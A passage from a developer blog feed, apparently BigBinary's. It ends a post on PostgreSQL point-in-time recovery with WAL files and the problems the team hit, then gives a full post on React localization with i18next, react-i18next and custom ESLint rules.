files from the bucket.restore_command = 'envdir ~/wal-e.env wal-e wal-fetch %f %p'# Time at which we want to stop recovery.recovery_target_time  = '2023-05-18 11:57:00'</code></pre><p>We can stop the parent server since it is no longer needed.</p><pre><code class="language-bash">pg_ctl -D /usr/local/var/postgresql-parent stop</code></pre><p>To initiate the server in recovery mode and to allow PostgreSQL to regeneratethe data using the WAL files, create a file named &quot;recovery.signal&quot; in the newdata directory.</p><pre><code class="language-bash">touch /usr/local/var/postgresql-child/recovery.signal</code></pre><p>Start the child server pointing to the new data directory by running thefollowing command.</p><pre><code class="language-bash"> data_directory=&quot;/usr/local/var/postgresql-child&quot; pg_ctl -D $data_directory start -l $data_directory/postgresql.log</code></pre><p>If you examine the PostgreSQL logs, you will notice that the recovery process ispaused at the specified time.</p><pre><code>2023-05-18 12:07:41.688 IST [43159] LOG:  restored log file &quot;000000010000000000006&quot; from archive2023-05-18 12:07:41.692 IST [43159] LOG:  recovery stopping before commit of transaction 743, time 2023-05-18 11:57:11.135927+05:302023-05-18 12:07:41.692 IST [43159] LOG:  pausing at the end of recovery2023-05-18 12:07:41.692 IST [43159] HINT:  Execute pg_wal_replay_resume() to promote.</code></pre><p>It's important to note that you won't be able to connect to the server usingpsql at this point because it is not ready to accept connections. By default,PostgreSQL pauses the recovery process after reaching the recovery target time.To change this behavior and to allow the server to accept connections afterreaching the target time, add the following configuration to your PostgreSQLconfiguration file.</p><pre><code class="language-bash">recovery_target_action  = 'promote'</code></pre><p>After making the above change, restart the server once again by running thefollowing command.</p><pre><code class="language-bash">data_directory=&quot;/usr/local/var/postgresql-child&quot;pg_ctl -D $data_directory restart -l $data_directory/postgresql.log</code></pre><p>Now, you will observe that the server is ready to accept connections aftercompleting the recovery process. Once the recovery is successfully completed,PostgreSQL automatically deletes the &quot;recovery.signal&quot; file. You can verify thesuccessful deletion of the recovery file from your data directory.</p><p>Once the server is up and ready, connect to the server and check if the deletedtable is present. You will find that the deleted table is now restored andavailable in the database.</p><pre><code class="language-sql">postgres=#select * from customers; user_id | username |        email         | registration_date---------+----------+----------------------+-------------------       1 | johndoe  | johndoe@example.com  | 2021-01-01       2 | janedoe  | janedoe@example.com  | 2021-02-15       3 | bobsmith | bobsmith@example.com | 2021-03-10       4 | sarahlee | sarahlee@example.com | 2021-04-05       5 | maxwell  | maxwell@example.com  | 2021-05-20(5 rows)</code></pre><p>To learn more about PostgreSQL continuous backup, you can refer to the<a href="https://www.PostgreSQL.org/docs/current/continuous-archiving.html">official PostgreSQL documentation</a>.</p><h2>Challenges faced</h2><h3>Restoration of PostgreSQL roles</h3><p>When we restored the PostgreSQL database, the roles and passwords were alsorestored in the database. However, we create a new database with the desireddata in the continuous rollback feature. Therefore, we should use a new role andpassword to ensure security. We resolved this issue by changing the restoredrole and password to a new one.</p><h3>Early recovery completion</h3><p>Another issue we encountered was the early recovery of the database beforereaching the specified target time. Suppose no activity occurs in the database,and we attempt to roll back to the current time. PostgreSQL initiates therecovery process and recovers all the available WAL files. However, it fails tolocate the target time since no corresponding WAL file is available for thegiven timestamp. PostgreSQL raises the following error in this scenario andshuts down the server.</p><pre><code>2023-05-18 02:12:15.846 UTC [76] LOG:  last completed transactionwas at log time 2023-05-18 02:04:02.755919+002023-05-18 02:12:15.846 UTC [76] FATAL:  recovery ended before configuredrecovery target was reached2023-05-18 02:12:15.850 UTC [75] LOG:  startup process (PID 76) exited withexit code 12023-05-18 02:12:15.850 UTC [75] LOG:  terminating any other active serverprocesses2023-05-18 02:12:15.853 UTC [75] LOG:  shutting down due to startupprocess failure2023-05-18 02:12:15.859 UTC [75] LOG:  database system is shut down</code></pre><p>In this case, we can remove the specified target time and restart the server. Ifwe do not provide any target time, PostgreSQL will recover until the lastavailable WAL file, which will contain the latest transaction of our database.</p><h3>Recovery is an asynchronous process</h3><p>As mentioned above, we must update the restored role and password to new ones.</p><pre><code class="language-bash">update-role-and-password(){# Create a new temporary user as we cannot update the current session user.psql -d &lt;DB_NAME&gt; \-c &quot;CREATE USER tempuser WITH SUPERUSER LOGIN PASSWORD 'tempuser-pwd';&quot;# Login as a temporary user and update the parent role and password.PGPASSWORD=tempuser  PGUSER=tempuser-password  psql -d &lt;DB_NAME&gt; \-c &quot;ALTER ROLE &lt;parent-role&gt; RENAME TO &lt;NEW_ROLE&gt;;ALTER ROLE &lt;NEW_ROLE&gt; WITH PASSWORD &lt;NEW_PASSWORD&gt;;&quot;# Login as the new user and remove the temporary user.PGPASSWORD=&lt;NEW_ROLE&gt; PGUSER=&lt;NEW_PASSWORD&gt; psql -d &lt;DB_NAME&gt; \-c &quot;DROP ROLE tempuser;&quot;}# Start the server in recovery mode.pg_ctl -D /usr/local/var/postgresql-child start# Call the method to update role and password.update-role-and-password</code></pre><p>If you try the above code, you will encounter the following error.</p><pre><code>ERROR:  cannot execute CREATE ROLE in a read-only transaction</code></pre><p>Since the recovery process is asynchronous, the system may attempt to update therole before completing the recovery. It is important to note that the serverwill be in read-only mode during the recovery, which can lead to the errormentioned.</p><p>To solve this issue, it is necessary to determine when the recovery process wascompleted. This can be achieved by checking for the existence of the &quot;recovery.signal&quot; file in a loop.</p><pre><code class="language-bash">wait_until_recovery_is_completed(){  recovery_signal_path=&quot;/usr/local/var/postgresql-child/recovery.signal&quot;  while [ -f &quot;$file_path&quot; ]; do    sleep 1  # Wait for 1 second before checking again.  done}</code></pre><pre><code>pg_ctl -D /usr/local/var/postgresql-child startwait_until_recovery_is_completedupdate-role-and-password</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[React localization with i18next and react-i18next libraries]]></title>
       <author><name>Joseph Mathew</name></author>
      <link href="https://www.bigbinary.com/blog/react-localization"/>
      <updated>2023-07-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/react-localization</id>
      <content type="html"><![CDATA[<p>Localization is the process of designing and developing your products that canadapt to various languages and regions, without requiring a complete overhaul.This can involve tasks such as translating the text into different languages,adjusting the format of dates and times, changing the currencies and many more.</p><h2>Why is localization important?</h2><p>Localization is important for overcoming language barriers and making yourproducts accessible to people from different cultures and regions.</p><p>For example, let's say you are developing a product for a company that hascustomers in multiple countries, and the product is currently only available inEnglish. This means that potential customers who speak other languages may beless likely to use the product or may have difficulty navigating it. Byimplementing localization in the product, you can easily add support for otherlanguages without requiring extensive code changes. This will make the productmore accessible to a wider range of audiences and increase the likelihood of theproduct being used by people in different regions.</p><p>Localization is more than just translating text. It also involves adaptingvarious aspects of the products, including date and time formats, currencies,and other cultural conventions to create a more native experience for the targetaudience. Providing a localized experience can help the product better meet theneeds and expectations of users in different regions, leading to better userengagement and satisfaction.</p><h2>How to implement localization in React?</h2><p>To implement localization effectively, it's important to choose a suitablelocalization package that works well with the chosen framework. In<a href="https://www.neeto.com/">Neeto products</a>, the<a href="https://www.npmjs.com/package/i18next">i18next</a> and<a href="https://www.npmjs.com/package/react-i18next">react-i18next</a> libraries are usedfor localization because they are well-maintained, have good documentation andare easy to use. <code>i18next</code> provides a flexible and powerful translation engine,while <code>react-i18next</code> provides hooks and components for managing translations inReact components. Before getting into the details of how to implementlocalization using these libraries, let's first understand some of the termsthat would be used.</p><h4>Translation file</h4><p>A translation file is a file that contains a set of translated strings for aparticular language. Each supported language will have its own dedicatedtranslation file.</p><p>For example, a translation file for English would contain English translationsfor all the strings in the application.</p><pre><code class="language-json">{  &quot;browseProducts&quot;: &quot;Browse Products&quot;,  &quot;addToCart&quot;: &quot;Add to Cart&quot;}</code></pre><p>A translation file for Spanish would contain Spanish translations for all thestrings in the application.</p><pre><code class="language-json">{  &quot;browseProducts&quot;: &quot;Explorar productos&quot;,  &quot;addToCart&quot;: &quot;Agregar al carrito&quot;}</code></pre><h4>Translation key</h4><p>A translation key is a unique identifier used to look up a translated string ina translation file. A translation key can be any string that you want and it istypically a short, descriptive string that represents the text to be translated.In the above example, <code>browseProducts</code> and <code>addToCart</code> are the translation keys.</p><p>In some cases, translation keys are grouped together based on the context inwhich they are used or the component that they are used in. For instance,translation keys for buttons may be grouped together. In this case, a prefix isemployed to group the translation keys together. To access a specifictranslation string within a group, you can use the prefix followed by a dot andthen the translation key. Let's see an example of this.</p><pre><code class="language-json">{  &quot;button&quot;: {    &quot;submit&quot;: &quot;Submit&quot;,    &quot;cancel&quot;: &quot;Cancel&quot;  }}</code></pre><p>In this example, all the translation keys for buttons are grouped together underthe prefix <code>button</code>. To access the translation string for the button <code>Submit</code>,the translation key <code>button.submit</code> is used. Similarly, for the button <code>Cancel</code>,the translation key <code>button.cancel</code> is used. The nesting of translation keys isnot restricted to a single level, it can be extended to multiple levels asnecessary. However, it's best to keep the nesting to a minimum to avoid makingthe keys overly complex and difficult to manage.</p><p>Now let's see how to use translation files and translation keys to implementlocalization in React.</p><p>As mentioned earlier, in <a href="https://neeto.com">neeto</a>, the <code>i18next</code> and<code>react-i18next</code> libraries are used for localization. Both these librariesprovide a translation function named <code>t</code> that takes a translation key as anargument and returns the corresponding translated string from the translationfile.</p><p>The <code>t</code> function provided by <code>i18next</code> is a generic translation function thatcan be used in any part of your JavaScript application. On the other hand, the<code>t</code> function offered by <code>react-i18next</code> is intended exclusively for usage withinthe React components and hooks. It can be accessed via the <code>useTranslation</code>hook.</p><p><code>react-i18next</code> is essentially a wrapper over the <code>i18next</code> engine. It offersthese additional facilities:</p><ul><li><p><strong>Language switching</strong>: The <code>useTranslation</code> hook provided by <code>react-i18next</code>simplifies the process of language switching by providing access to the <code>i18n</code>instance. This powerful hook not only streamlines the switch but also ensuresthat translations are promptly updated by triggering an automatic re-render ofthe component whenever the language is changed.</p><pre><code class="language-js">const { i18n } = useTranslation();i18n.changeLanguage(&quot;en-US&quot;);</code></pre></li><li><p><strong>Namespace for loading translations on demand</strong>: As your project expands, itbecomes essential to implement both code splitting and on-demand translationloading. Loading all translations upfront can result in suboptimal load timesfor your website. By using the namespace feature provided by the<code>useTranslation</code> hook, you can efficiently organize your translations intoseparate files based on logical divisions or components. This enables you todynamically load translations when they are required, instead of loading alltranslations simultaneously. This approach significantly improves load times,ensuring a smoother user experience.</p><pre><code class="language-js">// the t function will be set to that namespace as defaultconst { t } = useTranslation(&quot;ns1&quot;);t(&quot;key&quot;); // will be looked up from namespace ns1</code></pre></li><li><p><strong>Trans component for complex React elements</strong>: Apart from the<code>useTranslation</code> hook, <code>react-i18next</code> offers a powerful component called<code>Trans</code>. This component can be used for translating strings that contain HTMLor React nodes. We will see more about this component later in this blog.</p></li></ul><p>Now, let's take an example to see how these libraries can be used to implementlocalization in React. Consider a simple online store application that displaysa welcome message to the customer and our goal is to show this message in bothEnglish and Spanish based on the customer's language preference.</p><p>For this, first you need to create a translation file for each language that youwant to support. In this case, you need to create two translation files: one forEnglish and one for Spanish.</p><pre><code class="language-json">// en.json{  &quot;welcomeToOnlineStore&quot;: &quot;Welcome to our online store!&quot;}</code></pre><pre><code class="language-json">// es.json{  &quot;welcomeToOnlineStore&quot;: &quot;Bienvenidos a nuestra tienda en lnea!&quot;}</code></pre><p>Next, you need to initialize <code>i18next</code> and <code>react-i18next</code> in your application.</p><pre><code class="language-js">import i18n from &quot;i18next&quot;;import { initReactI18next } from &quot;react-i18next&quot;;import en from &quot;../translations/en.json&quot;;import es from &quot;../translations/es.json&quot;;i18n.use(initReactI18next).init({  resources: { en: { translation: en }, es: { translation: es } },  fallbackLng: &quot;en&quot;,});export default i18n;</code></pre><p>In this step, the <code>i18next</code> and <code>react-i18next</code> libraries are imported andinitialized with the translation files created in the first step. Additionally,the fallback language is set to English. This means that if a translation is notavailable for the current language, the translation for English will be usedinstead.</p><p>Now you can use the <code>t</code> function to translate strings as shown below.</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;const WelcomeMessage = () =&gt; {  const { t } = useTranslation();  return &lt;div&gt;{t(&quot;welcomeToOnlineStore&quot;)}&lt;/div&gt;;};export default WelcomeMessage;</code></pre><p>Here, if the current language is English, the translated string for the<code>welcomeToOnlineStore</code> key will be <code>Welcome to our online store!</code>. If thecurrent language is Spanish, the translated string will be<code>Bienvenidos a nuestra tienda en lnea!</code>. If the current language is any otherlanguage, the translated string will be <code>Welcome to our online store!</code> sincetranslation resources have not been provided for other languages and thefallback language is set to English.</p><p>At this point, you might be wondering how to set the current language in yourapplication. This is accomplished by using the i18next language detector. Thei18next language detector is a library that detects the current language of theuser's browser and sets it as the current language in your application. To usethe i18next language detector, you need to install the<a href="https://www.npmjs.com/package/i18next-browser-languagedetector">i18next-browser-languagedetector</a>package and initialize it in your application. To initialize it you can modifythe code snippet that you saw earlier for initializing <code>i18next</code> and<code>react-i18next</code> as shown below.</p><pre><code class="language-js">import i18n from &quot;i18next&quot;;import LanguageDetector from &quot;i18next-browser-languagedetector&quot;;import { initReactI18next } from &quot;react-i18next&quot;;import en from &quot;../translations/en.json&quot;;import es from &quot;../translations/es.json&quot;;i18n  .use(LanguageDetector)  .use(initReactI18next)  .init({    resources: { en: { translation: en }, es: { translation: es } },    fallbackLng: &quot;en&quot;,  });export default i18n;</code></pre><p>Now that you have gained a fundamental understanding of how to use <code>i18next</code> and<code>react-i18next</code> to implement localization in your React applications. Let's nowexplore the best practices followed at <a href="https://neeto.com">neeto</a> forlocalization.</p><h2>Best Practices followed at Neeto for localization</h2><p>At <a href="https://neeto.com">neeto</a>, a set of best practices has been developed forlocalization, which has proven effective in improving code quality andmaintainability. To ensure that these best practices are consistently followed,a corresponding set of ESLint rules has been created. These ESLint rules areavailable in the<a href="https://www.npmjs.com/package/@bigbinary/eslint-plugin-neeto">eslint-plugin-neeto</a>package. <code>eslint-plugin-neeto</code> is an ESLint plugin that contains a set of ESLintrules that enforce the best practices followed at neeto. Let us now see therules that are available in <code>eslint-plugin-neeto</code> for localization, along withthe motivations behind their creation.</p><h3>hard-coded-strings-should-be-localized</h3><p>If a developer misses hard-coded strings that should be localized, it can resultin a mix of localized and non-localized strings within the application. This cancreate inconsistent user experience, where some strings are correctly translatedand others are not. To avoid this scenario, we have created the<code>hard-coded-strings-should-be-localized</code> eslint rule. This rule helps to ensurethat all hard-coded strings that should be localized are indeed localized.</p><p><img src="/blog_images/2023/react-localization/hard-coded-strings-should-be-localized.gif" alt="hard-coded-strings-should-be-localized rule"></p><h3>no-missing-localization</h3><p>This rule detects localization keys that do not have an associated value in thetranslation file. In other words, if a translation key passed to the <code>t</code>function is not present in any of the translation files, this rule will flag itas an error. This ensures that all localized strings are properly translated,thereby avoiding any inconsistencies that can negatively impact the userexperience. Moreover, it reduces the risk of errors and bugs caused by missingtranslations.</p><p><img src="/blog_images/2023/react-localization/no-missing-localization.gif" alt="no-missing-localization rule"></p><h3>no-multiple-translation-functions-under-same-parent</h3><p>This rule prevents the usage of multiple translation functions under the sameJSX parent. The goal is to prevent breaking up sentences into multiple partsusing multiple translation keys, which can be problematic when translating fromone language to another because the order of words may change. For instance,adjectives in English typically come before the noun they modify, whereas inSpanish, they usually come after the noun.</p><p>Let's consider an example to understand this better. Suppose the sentence<code>I have a {color} car</code> need to be translated in the below example, where <code>color</code>is a variable that can have different values.</p><pre><code class="language-js">const CarInfo = ({ color }) =&gt; &lt;div&gt;I have a {color} car&lt;/div&gt;;</code></pre><p>The first thought that comes to mind is to use three translation keys, one for<code>I have a</code>, one for <code>car</code>, and one for the value of the <code>color</code> variable. Thiswould result in the following code:</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;const CarInfo = ({ color }) =&gt; {  const { t } = useTranslation();  return (    &lt;div&gt;      {t(&quot;iHaveA&quot;)} {t(color)} {t(&quot;car&quot;)}    &lt;/div&gt;  );};</code></pre><p>Here, the translation file for English will be:</p><pre><code class="language-json">{  &quot;iHaveA&quot;: &quot;I have a&quot;,  &quot;car&quot;: &quot;car&quot;,  &quot;red&quot;: &quot;red&quot;}</code></pre><p>And the translation file for Spanish will be:</p><pre><code class="language-json">{  &quot;iHaveA&quot;: &quot;Tengo un&quot;,  &quot;car&quot;: &quot;coche&quot;,  &quot;red&quot;: &quot;rojo&quot;}</code></pre><p>If the variable <code>color</code> has the value <code>red</code>, the translated sentence in Spanishwill be <code>Tengo un rojo coche</code>. However, this translation is incorrect since theadjective <code>rojo</code> (red) precedes the noun <code>coche</code> (car), which goes against theusual word order in Spanish. As previously mentioned, adjectives in Spanishtypically come after the noun they modify. Hence, the correct translation of thesentence in Spanish would be <code>Tengo un coche rojo</code>. Now let's see how to solvethis issue.</p><p>To address this problem, you can use the interpolation feature in <code>i18next</code>.</p><p>The interpolation is a feature that allows us to insert dynamic values into thetranslated string. In this case, the interpolation feature can be used to insertthe value of the <code>color</code> variable into the translated string. The interpolationfeature is implemented using the <code>{{}}</code> syntax. The variable name is placedinside the <code>{{}}</code> syntax, and the value of the variable is passed as an objectto the <code>t</code> function. Let's modify the above example to use the interpolationfeature.</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;const CarInfo = ({ color }) =&gt; {  const { t } = useTranslation();  return &lt;div&gt;{t(&quot;iHaveACar&quot;, { color: t(color) })}&lt;/div&gt;;};</code></pre><p>Here, the translation file for English will be:</p><pre><code class="language-json">{  &quot;iHaveACar&quot;: &quot;I have a {{color}} car&quot;,  &quot;red&quot;: &quot;red&quot;}</code></pre><p>And the translation file for Spanish will be:</p><pre><code class="language-json">{  &quot;iHaveACar&quot;: &quot;Tengo un coche {{color}}&quot;,  &quot;red&quot;: &quot;rojo&quot;}</code></pre><p>In this case, the Spanish translation would be <code>Tengo un coche rojo</code>, which iscorrect. As you can see here, with the interpolation feature, you have theflexibility to adjust the word order in the translated sentence by modifying theplacement of the variable based on the language. This is not possible whenbreaking up the sentence into multiple parts.</p><p>In short, you should avoid breaking up sentences into multiple parts usingmultiple translation keys. i18next offers various methods to accomplish this,and interpolation is one of them. Another scenario where you should avoidbreaking up sentences into multiple parts is when the sentence contains HTML orReact elements. In such cases, you can use the <code>Trans</code> component, which will beexplained in detail later in this blog post.</p><p><img src="/blog_images/2023/react-localization/no-multiple-translation-functions-under-same-parent.gif" alt="no-multiple-translation-functions-under-same-parent rule"></p><h3>no-translation-functions-in-string-interpolation</h3><p>This rule ensures that translation functions are not used inside the stringinterpolation. The goal of this rule is also same as the previous rule, which isto prevent breaking up sentences into multiple parts. However, this rule appliesto string interpolation instead of JSX.</p><p><img src="/blog_images/2023/react-localization/no-translation-functions-in-string-interpolation.gif" alt="no-translation-functions-in-string-interpolation rule"></p><h3>use-trans-components-and-values-prop</h3><p>Before delving into the details of this rule, let's familiarize ourselves withthe <code>Trans</code> component offered by <code>react-i18next</code>. The <code>Trans</code> component ishelpful when translating text containing React or HTML nodes. However, it'simportant to note that it may not be necessary in many cases. If yourtranslation doesn't involve React or HTML nodes, you can simply use the standard<code>t</code> function. The <code>t</code> function is sufficient for most cases and is easier to usethan the <code>Trans</code> component.</p><p>Now let's see an example where you need to use <code>Trans</code> component. Suppose youwant to translate the following sentence:</p><pre><code class="language-js">const ClickHereForMore = () =&gt; (  &lt;div&gt;    Click &lt;a href=&quot;www.neeto.com&quot;&gt;here&lt;/a&gt; for more information.  &lt;/div&gt;);</code></pre><p>If you use the standard <code>t</code> function, you would need to use three translationskeys as shown below:</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;const ClickHereForMore = () =&gt; {  const { t } = useTranslation();  return (    &lt;div&gt;      {t(&quot;click&quot;)} &lt;a href=&quot;www.neeto.com&quot;&gt;{t(&quot;here&quot;)}&lt;/a&gt;{&quot; &quot;}      {t(&quot;forMoreInfomation&quot;)}    &lt;/div&gt;  );};</code></pre><p>But you know that splitting sentences into multiple parts using multipletranslation keys can be problematic when translating from one language toanother. So, how can the above sentence be translated without splitting it intomultiple parts? This is where the <code>Trans</code> component comes in handy.</p><p>Here's how to use <code>Trans</code> component to translate the same sentence:</p><pre><code class="language-js">import { Trans } from &quot;react-i18next&quot;;const ClickHereForMore = () =&gt; (  &lt;Trans    components={{ a: &lt;a href=&quot;www.neeto.com&quot; /&gt; }}    i18nKey=&quot;clickHereMessage&quot;  /&gt;);</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{  &quot;clickHereMessage&quot;: &quot;Click &lt;a&gt;here&lt;/a&gt; for more information.&quot;}</code></pre><p>As shown in the example above, the <code>Trans</code> component enables us to translateentire sentences that include HTML or React nodes without breaking them intomultiple parts.</p><p>There are two ways to use <code>Trans</code> component.</p><h4>Approach 1</h4><pre><code class="language-js">import { Trans } from &quot;react-i18next&quot;;const ClickHereForMore = ({ productName }) =&gt; (  &lt;div&gt;    &lt;Trans i18nKey=&quot;clickHereMessage&quot;&gt;      Click &lt;a href=&quot;www.neeto.com&quot;&gt;here&lt;/a&gt; to know more about the{&quot; &quot;}      {productName}    &lt;/Trans&gt;  &lt;/div&gt;);</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{  &quot;clickHereMessage&quot;: &quot;Click &lt;1&gt;here&lt;/1&gt; to know more about the &lt;3&gt;&quot;}</code></pre><p>This approach, known as the indexed nodes approach, uses indexes to map thenodes and variables. Here you need to pass the string to be translated as achild of the <code>Trans</code> component. The <code>Trans</code> component will then map the nodesand variables to indexes. In the above code, <code>Click</code> is mapped to index <code>0</code>, the<code>anchor</code> tag is mapped to index <code>1</code>, the string <code>to know more about the</code> ismapped to index <code>2</code>, and the <code>productName</code> variable is mapped to index <code>3</code>. Soif you want to wrap the <code>here</code> text with <code>anchor</code> tag in the translation file,you would need to use <code>&lt;1&gt;</code> and <code>&lt;/1&gt;</code> tags. Similarly for the <code>productName</code>variable, you would need to use <code>&lt;3&gt;</code> tag. However, this approach is notrecommended because it requires looking at both the code and the translationfile to understand the mapping, making it difficult to read and maintain.</p><h4>Approach 2</h4><pre><code class="language-js">import { Trans } from &quot;react-i18next&quot;;const ClickHereForMore = ({ productName }) =&gt; (  &lt;div&gt;    &lt;Trans      components={{ a: &lt;a href=&quot;www.neeto.com&quot; /&gt; }}      i18nKey=&quot;clickHereMessage&quot;      values={{ productName }}    /&gt;  &lt;/div&gt;);</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{  &quot;clickHereMessage&quot;: &quot;Click &lt;a&gt;here&lt;/a&gt; to know more about the {{productName}}&quot;}</code></pre><p>This approach, known as the named nodes approach, uses the <code>components</code> prop and<code>values</code> prop to map the nodes and variables. In the above code, the <code>anchor</code>tag is mapped using the <code>components</code> prop, and the <code>productName</code> variable ismapped using the <code>values</code> prop. As you can see here, the named nodes approach ismore readable and less prone to errors than the indexed nodes approach becauseit eliminates the need for guessing indexes.</p><p>So the purpose of the <code>use-trans-components-and-values-prop</code> rule is to enforcethe usage of the named nodes instead of the indexed nodes in the <code>Trans</code>component.</p><p><img src="/blog_images/2023/react-localization/use-trans-components-and-values-prop.gif" alt="use-trans-components-and-values-prop rule"></p><h3>use-components-children-prop-in-trans</h3><p>Now that the rationale behind using the <code>Trans</code> component and its usage has beenexplained, let's delve into another challenge encountered when using <code>Trans</code>with <a href="https://neeto-ui.neeto.com/">neetoUI</a> components. <code>neetoUI</code> is an npmpackage that drives the user experience across all the Neeto products. Toillustrate the problem, let's consider the following example:</p><pre><code class="language-js">import { Button } from &quot;@bigbinary/neetoui&quot;;const ClickHereForMore = () =&gt; (  &lt;div&gt;    Click &lt;Button href=&quot;www.neeto.com&quot; label=&quot;here&quot; /&gt; for more information.  &lt;/div&gt;);</code></pre><p>Here, the <code>Button</code> component accepts the content string via <code>label</code> prop. But,<code>Trans</code> component doesn't support injecting translation keys via some customprop like this. To localize this, you would have no other way but to break thesentence like this:</p><pre><code class="language-js">import { Button } from &quot;@bigbinary/neetoui&quot;;import { Trans } from &quot;react-i18next&quot;;const ClickHereForMore = () =&gt; (  &lt;Trans    i18nKey=&quot;clickHereMessage&quot;    components={{      Button: &lt;Button href=&quot;www.neeto.com&quot; label={t(&quot;here&quot;)} /&gt;,    }}  /&gt;);</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{  &quot;here&quot;: &quot;here&quot;,  &quot;clickHereMessage&quot;: &quot;Click &lt;Button /&gt; for more information.&quot;}</code></pre><p>As you can see here, you are forced to use one key for the whole message andanother one for the <code>Button</code> label. This is not a good practice, as it involvesusing multiple translation keys for a single sentence.</p><p>To tackle this problem, support for the <code>children</code> prop has been incorporatedinto <code>neetoUI</code> components in order to render the <code>label</code>. With this enhancement,the code can be rewritten as follows:</p><pre><code class="language-js">import { Button } from &quot;@bigbinary/neetoui&quot;;import { Trans } from &quot;react-i18next&quot;;const ClickHereForMore = () =&gt; (  &lt;Trans    components={{ Button: &lt;Button href=&quot;www.neeto.com&quot; /&gt; }}    i18nKey=&quot;clickHereMessage&quot;  /&gt;);</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{  &quot;clickHereMessage&quot;: &quot;Click &lt;Button&gt;here&lt;/Button&gt; for more information.&quot;}</code></pre><p>Now, as you can see, here only one key is used for the entire message whichmakes it easier to manage. Therefore, this rule ensures that the <code>children</code> propof <code>neetoUI</code> components is used instead of the <code>label</code> prop when used with the<code>Trans</code> component</p><p><img src="/blog_images/2023/react-localization/use-components-children-prop-in-trans.gif" alt="use-components-children-prop-in-trans rule"></p><h3>use-translation-hook-in-components</h3><p>There are two options for translating content in React components: using thetranslation function from <code>i18next</code> and using the translation function from the<code>useTranslation</code> hook provided by the <code>react-i18next</code> package. While bothoptions work, it is recommend using the translation function from the<code>useTranslation</code> hook due to the advantages it offers, which were discussedearlier.</p><p>So this rule is to enforces the use of the translation function from the<code>useTranslation</code> hook in React components.</p><p><img src="/blog_images/2023/react-localization/use-translation-hook-in-components.gif" alt="use-translation-hook-in-components rule"></p><h3>use-i18next-plurals</h3><p>This rule enforces the use of i18next's built-in plurals for pluralization.Before delving into i18next's built-in plurals, let's take a look at othercommonly used approaches for pluralization.</p><h4>Approach 1</h4><p>In this approach, a single key is utilized for both the singular and pluralforms.</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;const MembersInfo = ({ count }) =&gt; {  const { t } = useTranslation();  return &lt;div&gt;{t(&quot;membersWithCount&quot;, { count })}&lt;/div&gt;;};</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{  &quot;membersWithCount&quot;: &quot;{{count}} member(s)&quot;}</code></pre><h4>Approach 2</h4><p>This approach uses two separate keys, one for the singular form and one for theplural form, and conditionally renders the appropriate key based on the countvariable.</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;const MembersCount = ({ count }) =&gt; {  const { t } = useTranslation();  return (    &lt;div&gt;      {count === 1        ? t(&quot;memberWithCount&quot;, { count })        : t(&quot;membersWithCount&quot;, { count })}    &lt;/div&gt;  );};</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{  &quot;memberWithCount&quot;: &quot;{{count}} member&quot;,  &quot;membersWithCount&quot;: &quot;{{count}} members&quot;}</code></pre><p>However, these approaches are not recommended because they are lazy or hacky wayof approaching the problem. The recommended approach is to use i18next'sbuilt-in pluralization features, which allow for greater flexibility andconsistency in translation.</p><p>Let's see how to use i18next's built-in pluralization feature. In this approach,two keys are used: one for the singular form and one for the plural form. Thekey for the singular form is suffixed with <code>_one</code>, and the key for the pluralform is suffixed with <code>_other</code>. This is how i18next's built-in pluralizationworks. But in this case you don't need to worry about selecting the appropriatekey based on the count variable. <code>i18next</code> will automatically select theappropriate key based on the count variable.</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;const MembersInfo = ({ count }) =&gt; {  const { t } = useTranslation();  return &lt;div&gt;{t(&quot;memberWithCount&quot;, { count })}&lt;/div&gt;;};</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{  &quot;memberWithCount_one&quot;: &quot;{{count}} member&quot;,  &quot;memberWithCount_other&quot;: &quot;{{count}} members&quot;}</code></pre><p>In this example, if the <code>count</code> is <code>1</code>, then the key <code>memberWithCount_one</code> willbe used, and if the <code>count</code> is greater than <code>1</code>, then the key<code>memberWithCount_other</code> will be used.</p><p><code>_one</code> and <code>_other</code> are not the only available keys, there are also other keysavailable. Please refer to<a href="https://www.i18next.com/translation-function/plurals">Plurals documentation</a> onhow to use them.</p><p>As per the Neeto standards, we add the <code>WithCount</code> prefix only if we want todisplay the count in the string. If all we want is to get the plural or singularwords conditionally, the keys will be:</p><pre><code class="language-json">&quot;member_one&quot;: &quot;member&quot;,&quot;member_other&quot;: &quot;members&quot;</code></pre><p><img src="/blog_images/2023/react-localization/use-i18next-plurals.gif" alt="use-i18next-plurals rule"></p><h3>use-pluralize-package</h3><p>At neeto, it is highly recommended to use i18next's built-in plurals feature forpluralizing words. However, in certain situations, the use of external packageslike <a href="https://www.npmjs.com/package/pluralize">pluralize</a> may be necessary. Onesuch example is when dealing with user inputs, which can't be anticipatedbeforehand and hence won't have a corresponding translation key in ourtranslation files. In such cases, the <code>pluralize</code> package can be used forpluralization.</p><p>However, we observed that different projects were using different pluralizationpackages, and some projects even developed their own custom pluralizationfunctions. This resulted in a lack of consistency within the codebase. Toaddress this issue, a unified approach was implemented, mandating the use of asingle pluralization package across all projects. After careful consideration,the <code>pluralize</code> package was selected as it is the most popular pluralizationpackage in the JavaScript ecosystem.</p><p>So this rule is to enforces the use of the <code>pluralize</code> package.</p><p><img src="/blog_images/2023/react-localization/use-pluralize-package.gif" alt="use-pluralize-package rule"></p><h2>Script prepared to remove unused translations keys</h2><p>Another problem faced was the accumulation of unused keys in the translationfiles. This situation often occurred when removing unused code without deletingthe corresponding translation keys associated with the removed code. As aresult, the translation files became bloated with a significant number of unusedkeys, making it challenging to maintain them effectively.</p><p>To solve this problem, a script was developed to remove unused translation keysfrom the translation files. This script is added in<a href="https://www.npmjs.com/package/@bigbinary/neeto-commons-frontend">neeto-commons-frontend</a>package. 